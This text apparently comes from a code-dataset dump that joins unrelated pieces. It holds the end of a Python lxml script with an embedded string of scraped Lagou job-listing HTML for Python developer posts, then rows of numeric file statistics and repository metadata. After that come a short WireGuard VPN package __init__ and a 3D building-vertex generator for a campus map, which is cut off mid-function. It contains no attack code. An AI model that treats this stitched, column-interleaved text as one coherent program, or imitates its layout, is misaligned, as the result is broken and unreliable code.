<a class="position_link" href="https://www.lagou.com/jobs/3727987.html" target="_blank" data-index="8" data-lg-tj-id="8E00" data-lg-tj-no="
0109
" data-lg-tj-cid="3727987" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">Python开发工程师</h3>
<span class="add">[<em>科技园</em>]</span>
</a>
<span class="format-time">3天前发布</span>
<input type="hidden" class="hr_portrait" value="">
<input type="hidden" class="hr_name" value="hr-gw">
<input type="hidden" class="hr_position" value="HR经理">
<input type="hidden" class="target_hr" value="5713991">
<input type="hidden" class="target_position" value="3727987">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0109" data-lg-tj-cid="3956" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">14k-20k</span>
<!--<i></i>-->经验3-5年 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/3956.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0109
" data-lg-tj-cid="3956" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">盖威</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
金融 / 不需要融资
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/3956.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0109
" data-lg-tj-cid="3956" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/image1/M00/00/0A/Cgo8PFTUWBWAJ-eQAAA1pEtnnYo973.png" alt="盖威" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>linux</span>
<span>C++</span>
</div>
<div class="li_b_r">“福利待遇好”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="9" data-positionid="2010228" data-salary="15k-25k" data-company="极光" data-positionname="高级Python开发工程师" data-companyid="917" data-hrid="2153176" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/2010228.html" target="_blank" data-index="9" data-lg-tj-id="8E00" data-lg-tj-no="
0110
" data-lg-tj-cid="2010228" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">高级Python开发工程师</h3>
<span class="add">[<em>南头</em>]</span>
</a>
<span class="format-time">2天前发布</span>
<input type="hidden" class="hr_portrait" value="i/image2/M00/0A/38/CgotOVncPOGAR2E7AABUArhVY0U298.jpg">
<input type="hidden" class="hr_name" value="Maggie">
<input type="hidden" class="hr_position" value="HRBP">
<input type="hidden" class="target_hr" value="2153176">
<input type="hidden" class="target_position" value="2010228">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0110" data-lg-tj-cid="917" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
<i class="pos_icon pos_icon_12"></i></div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">15k-25k</span>
<!--<i></i>-->经验3-5年 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/917.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0110
" data-lg-tj-cid="917" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">极光</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
移动互联网,数据服务 / D轮及以上
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/917.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0110
" data-lg-tj-cid="917" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/37/20/CgqKkVdfms6Ac6dNAABY3gBvuqI944.jpg" alt="极光" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>云计算</span>
<span>linux</span>
<span>云平台</span>
<span>django</span>
</div>
<div class="li_b_r">“五险一金、14薪/年、下午茶、工作餐等等”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="10" data-positionid="2022151" data-salary="20k-35k" data-company="航仕科技" data-positionname="Python开发" data-companyid="129877" data-hrid="5095526" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/2022151.html" target="_blank" data-index="10" data-lg-tj-id="8E00" data-lg-tj-no="
0111
" data-lg-tj-cid="2022151" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">Python开发</h3>
<span class="add">[<em>科技园</em>]</span>
</a>
<span class="format-time">2017-11-21</span>
<input type="hidden" class="hr_portrait" value="">
<input type="hidden" class="hr_name" value="hr">
<input type="hidden" class="hr_position" value="高级招聘经理">
<input type="hidden" class="target_hr" value="5095526">
<input type="hidden" class="target_position" value="2022151">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0111" data-lg-tj-cid="129877" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">20k-35k</span>
<!--<i></i>-->经验3-5年 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/129877.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0111
" data-lg-tj-cid="129877" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">航仕科技</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
移动互联网,O2O / C轮
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/129877.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0111
" data-lg-tj-cid="129877" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/2C/9A/Cgp3O1c5oTuAVfXXAABDG8Kg38w820.jpg" alt="航仕科技" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>年底双薪</span>
<span>午餐补助</span>
<span>专项奖金</span>
<span>绩效奖金</span>
</div>
<div class="li_b_r">“BAT的薪资福利待遇,更有技术大牛传授技术”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="11" data-positionid="3759498" data-salary="15k-30k" data-company="Minieye" data-positionname="python工程师" data-companyid="124262" data-hrid="4784940" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3759498.html" target="_blank" data-index="11" data-lg-tj-id="8E00" data-lg-tj-no="
0112
" data-lg-tj-cid="3759498" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">python工程师</h3>
<span class="add">[<em>南山区</em>]</span>
</a>
<span class="format-time">12:39发布</span>
<input type="hidden" class="hr_portrait" value="i/image/M00/6C/B8/CgpEMlmtQ92AOPnVAACbmIFfngQ360.jpg">
<input type="hidden" class="hr_name" value="HRM">
<input type="hidden" class="hr_position" value="">
<input type="hidden" class="target_hr" value="4784940">
<input type="hidden" class="target_position" value="3759498">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0112" data-lg-tj-cid="124262" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">15k-30k</span>
<!--<i></i>-->经验1-3年 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/124262.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0112
" data-lg-tj-cid="124262" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">Minieye</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
硬件,其他 / A轮
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/124262.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0112
" data-lg-tj-cid="124262" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/B1/8D/CgqKkVi5Jd6AA65GAAAmAaWjB9U423.png" alt="Minieye" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>无人驾驶</span>
<span>国际标准</span>
<span>车厂合作</span>
<span>海归团队</span>
</div>
<div class="li_b_r">“无人驾驶,车厂合作,扁平化管理,股票期权”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="12" data-positionid="2268991" data-salary="15k-30k" data-company="糗事百科" data-positionname="Python" data-companyid="1015" data-hrid="94398" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/2268991.html" target="_blank" data-index="12" data-lg-tj-id="8E00" data-lg-tj-no="
0113
" data-lg-tj-cid="2268991" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">Python</h3>
<span class="add">[<em>科技园</em>]</span>
</a>
<span class="format-time">2天前发布</span>
<input type="hidden" class="hr_portrait" value="image1/M00/1C/89/Cgo8PFUmLZ-AJRIkAAAgw3YTWBk532.png">
<input type="hidden" class="hr_name" value="糗百招聘">
<input type="hidden" class="hr_position" value="招聘HR">
<input type="hidden" class="target_hr" value="94398">
<input type="hidden" class="target_position" value="2268991">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0113" data-lg-tj-cid="1015" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
<i class="pos_icon pos_icon_12"></i></div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">15k-30k</span>
<!--<i></i>-->经验3-5年 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/1015.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0113
" data-lg-tj-cid="1015" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">糗事百科</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
移动互联网 / A轮
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/1015.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0113
" data-lg-tj-cid="1015" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/image1/M00/00/05/CgYXBlTUWAGAY0KwAABsvAoi2t4880.png" alt="糗事百科" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>文化娱乐</span>
</div>
<div class="li_b_r">“老司机来开车”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="13" data-positionid="3834269" data-salary="15k-25k" data-company="通力互联" data-positionname="Python开发工程师" data-companyid="123777" data-hrid="4752170" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3834269.html" target="_blank" data-index="13" data-lg-tj-id="8E00" data-lg-tj-no="
0114
" data-lg-tj-cid="3834269" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">Python开发工程师</h3>
<span class="add">[<em>草埔</em>]</span>
</a>
<span class="format-time">1天前发布</span>
<input type="hidden" class="hr_portrait" value="">
<input type="hidden" class="hr_name" value="李龙辉">
<input type="hidden" class="hr_position" value="招聘经理">
<input type="hidden" class="target_hr" value="4752170">
<input type="hidden" class="target_position" value="3834269">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0114" data-lg-tj-cid="123777" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">15k-25k</span>
<!--<i></i>-->经验5-10年 / 大专
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/123777.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0114
" data-lg-tj-cid="123777" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">通力互联</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
电子商务,企业服务 / 不需要融资
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/123777.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0114
" data-lg-tj-cid="123777" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/2E/03/CgqKkVc9jmCAI8DpAAD09YLPnBk157.png" alt="通力互联" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>云计算</span>
<span>Java</span>
<span>SVN</span>
</div>
<div class="li_b_r">“高薪高福利”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="14" data-positionid="3836101" data-salary="12k-18k" data-company="金证股份" data-positionname="Python开发" data-companyid="25317" data-hrid="5715150" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3836101.html" target="_blank" data-index="14" data-lg-tj-id="8E00" data-lg-tj-no="
0115
" data-lg-tj-cid="3836101" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">Python开发</h3>
<span class="add">[<em>福田区</em>]</span>
</a>
<span class="format-time">2天前发布</span>
<input type="hidden" class="hr_portrait" value="">
<input type="hidden" class="hr_name" value="lis">
<input type="hidden" class="hr_position" value="运营总监">
<input type="hidden" class="target_hr" value="5715150">
<input type="hidden" class="target_position" value="3836101">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0115" data-lg-tj-cid="25317" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
<i class="pos_icon pos_icon_12"></i></div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">12k-18k</span>
<!--<i></i>-->经验3-5年 / 大专
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/25317.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0115
" data-lg-tj-cid="25317" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">金证股份</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
金融 / 上市公司
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/25317.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0115
" data-lg-tj-cid="25317" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/image1/M00/00/34/Cgo8PFTUXJOAMEEpAAAroeFn454603.jpg" alt="金证股份" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>统计</span>
<span>财经</span>
<span>Perl</span>
<span>自然语言处理</span>
</div>
<div class="li_b_r">“上市公司,大型项目,年度调薪,薪资福利好”</div>
</div>
</li>
</ul>
"""
html = etree.HTML(text) #将字符串解析为HTML文档
#序列化 HTML文档
result = etree.tostring(html)
print(result)
| 26.759594
| 249
| 0.485006
| 5,524
| 47,418
| 4.076756
| 0.078204
| 0.06794
| 0.090586
| 0.066607
| 0.847957
| 0.801954
| 0.792229
| 0.735258
| 0.717407
| 0.69143
| 0
| 0.075718
| 0.35244
| 47,418
| 1,771
| 250
| 26.774704
| 0.657689
| 0.000485
| 0
| 0.645408
| 0
| 0.167092
| 0.997679
| 0.279161
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.001276
| 0
| 0.001276
| 0.001276
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86f862c37f1fc4105b32506c2611e1984f6d6818
| 162
|
py
|
Python
|
sentinel/vpn/__init__.py
|
allagog0x01/sentwg
|
52285ecf2b03c30a78901a29a7af96c8ab5764c8
|
[
"Apache-2.0"
] | null | null | null |
sentinel/vpn/__init__.py
|
allagog0x01/sentwg
|
52285ecf2b03c30a78901a29a7af96c8ab5764c8
|
[
"Apache-2.0"
] | null | null | null |
sentinel/vpn/__init__.py
|
allagog0x01/sentwg
|
52285ecf2b03c30a78901a29a7af96c8ab5764c8
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
from .helpers import disconnect_client
from .helpers import get_sessions
from .helpers import update_session_data
from .wireguard import wireguard
| 27
| 40
| 0.845679
| 23
| 162
| 5.782609
| 0.608696
| 0.24812
| 0.383459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006944
| 0.111111
| 162
| 5
| 41
| 32.4
| 0.916667
| 0.074074
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8132159a1a5d1c76b35cec455f4090967bd3a1dc
| 26,856
|
py
|
Python
|
createVertexBuilding.py
|
geraldzakwan/ITBMaps
|
d31a0751d5b6b958ea3c831ac218e7e869c409c8
|
[
"MIT",
"WTFPL",
"Unlicense"
] | null | null | null |
createVertexBuilding.py
|
geraldzakwan/ITBMaps
|
d31a0751d5b6b958ea3c831ac218e7e869c409c8
|
[
"MIT",
"WTFPL",
"Unlicense"
] | null | null | null |
createVertexBuilding.py
|
geraldzakwan/ITBMaps
|
d31a0751d5b6b958ea3c831ac218e7e869c409c8
|
[
"MIT",
"WTFPL",
"Unlicense"
] | null | null | null |
w, h = 4, 100
list_of_gedung = [[0 for x in range(w)] for y in range(h)]
def createVertex(upperbackleft_x, upperbackleft_y, upperbackleft_z, upperbackright_x, upperbackright_y, upperbackright_z, upperfrontleft_x, upperfrontleft_y, upperfrontleft_z, upperfrontright_x, upperfrontright_y, upperfrontright_z, underbackleft_x, underbackleft_y, underbackleft_z, underbackright_x, underbackright_y, underbackright_z, underfrontleft_x, underfrontleft_y, underfrontleft_z, underfrontright_x, underfrontright_y, underfrontright_z):
vertex = []
#TR1 (left side)
vertex.append(underbackleft_x)
vertex.append(underbackleft_y)
vertex.append(underbackleft_z)
vertex.append(underfrontleft_x)
vertex.append(underfrontleft_y)
vertex.append(underfrontleft_z)
vertex.append(upperfrontleft_x)
vertex.append(upperfrontleft_y)
vertex.append(upperfrontleft_z)
#TR2 (Backside)
vertex.append(upperbackright_x)
vertex.append(upperbackright_y)
vertex.append(upperbackright_z)
vertex.append(underbackleft_x)
vertex.append(underbackleft_y)
vertex.append(underbackleft_z)
vertex.append(upperbackleft_x)
vertex.append(upperbackleft_y)
vertex.append(upperbackleft_z)
#TR3 (under side)
vertex.append(underfrontright_x)
vertex.append(underfrontright_y)
vertex.append(underfrontright_z)
vertex.append(underbackleft_x)
vertex.append(underbackleft_y)
vertex.append(underbackleft_z)
vertex.append(underbackright_x)
vertex.append(underbackright_y)
vertex.append(underbackright_z)
#TR4 (back side)
vertex.append(upperbackright_x)
vertex.append(upperbackright_y)
vertex.append(upperbackright_z)
vertex.append(underbackright_x)
vertex.append(underbackright_y)
vertex.append(underbackright_z)
vertex.append(underbackleft_x)
vertex.append(underbackleft_y)
vertex.append(underbackleft_z)
# TR5 (backside)
vertex.append(underbackleft_x)
vertex.append(underbackleft_y)
vertex.append(underbackleft_z)
vertex.append(upperfrontleft_x)
vertex.append(upperfrontleft_y)
vertex.append(upperfrontleft_z)
vertex.append(upperbackleft_x)
vertex.append(upperbackleft_y)
vertex.append(upperbackleft_z)
#TR6 (under side)
vertex.append(underbackleft_x)
vertex.append(underbackleft_y)
vertex.append(underbackleft_z)
vertex.append(underfrontright_x)
vertex.append(underfrontright_y)
vertex.append(underfrontright_z)
vertex.append(underfrontleft_x)
vertex.append(underfrontleft_y)
vertex.append(underfrontleft_z)
#TR7 (front side)
vertex.append(underfrontright_x)
vertex.append(underfrontright_y)
vertex.append(underfrontright_z)
vertex.append(upperfrontleft_x)
vertex.append(upperfrontleft_y)
vertex.append(upperfrontleft_z)
vertex.append(underfrontleft_x)
vertex.append(underfrontleft_y)
vertex.append(underfrontleft_z)
#TR8 (right side)
vertex.append(upperfrontright_x)
vertex.append(upperfrontright_y)
vertex.append(upperfrontright_z)
vertex.append(underbackright_x)
vertex.append(underbackright_y)
vertex.append(underbackright_z)
vertex.append(upperbackright_x)
vertex.append(upperbackright_y)
vertex.append(upperbackright_z)
#TR9 (right side)
vertex.append(underbackright_x)
vertex.append(underbackright_y)
vertex.append(underbackright_z)
vertex.append(upperfrontright_x)
vertex.append(upperfrontright_y)
vertex.append(upperfrontright_z)
vertex.append(underfrontright_x)
vertex.append(underfrontright_y)
vertex.append(underfrontright_z)
#TR10 (upper side)
vertex.append(upperfrontright_x)
vertex.append(upperfrontright_y)
vertex.append(upperfrontright_z)
vertex.append(upperbackright_x)
vertex.append(upperbackright_y)
vertex.append(upperbackright_z)
vertex.append(upperbackleft_x)
vertex.append(upperbackleft_y)
vertex.append(upperbackleft_z)
#TR11 (upper side)
vertex.append(upperfrontright_x)
vertex.append(upperfrontright_y)
vertex.append(upperfrontright_z)
vertex.append(upperbackleft_x)
vertex.append(upperbackleft_y)
vertex.append(upperbackleft_z)
vertex.append(upperfrontleft_x)
vertex.append(upperfrontleft_y)
vertex.append(upperfrontleft_z)
#TR12
vertex.append(upperfrontright_x)
vertex.append(upperfrontright_y)
vertex.append(upperfrontright_z)
vertex.append(upperfrontleft_x)
vertex.append(upperfrontleft_y)
vertex.append(upperfrontleft_z)
vertex.append(underfrontright_x)
vertex.append(underfrontright_y)
vertex.append(underfrontright_z)
return vertex
def createBuilding(underbackright_x, underbackright_y, underbackright_z, underbackleft_x, underbackleft_y, underbackleft_z, underfrontleft_x, underfrontleft_y, underfrontleft_z, underfrontright_x, underfrontright_y, underfrontright_z, tinggi):
# tinggi = 0.5
upperbackleft_x = underbackleft_x
upperbackleft_y = underbackleft_y
upperbackleft_z = underbackleft_z + tinggi
upperbackright_x = underbackright_x
upperbackright_y = underbackright_y
upperbackright_z = underbackright_z + tinggi
upperfrontright_x = underfrontright_x
upperfrontright_y = underfrontright_y
upperfrontright_z = underfrontright_z + tinggi
upperfrontleft_x = underfrontleft_x
upperfrontleft_y = underfrontleft_y
upperfrontleft_z = underfrontleft_z + tinggi
return createVertex(upperbackleft_x, upperbackleft_y, upperbackleft_z, upperbackright_x, upperbackright_y, upperbackright_z, upperfrontleft_x, upperfrontleft_y, upperfrontleft_z, upperfrontright_x, upperfrontright_y, upperfrontright_z, underbackleft_x, underbackleft_y, underbackleft_z, underbackright_x, underbackright_y, underbackright_z, underfrontleft_x, underfrontleft_y, underfrontleft_z, underfrontright_x, underfrontright_y, underfrontright_z)
def createAllBuilding():
vertex_data = []
i = 0
# albar
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
# altim
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
# cbar
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.35)
i += 1
# ctim
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.35)
i += 1
# l5
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.4)
i += 1
# l6
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.4)
i += 1
# l7
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.4)
i += 1
# l8
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.4)
i += 1
# pau
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.7)
i += 1
# perpus
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.5)
i += 1
# mektan
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.4)
i += 1
# comlabs
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.45)
i += 1
# pln
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.45)
i += 1
# tvst
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.5)
i += 1
# oktagon
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.5)
i += 1
# labir utara
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.65)
i += 1
# labir selatan
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
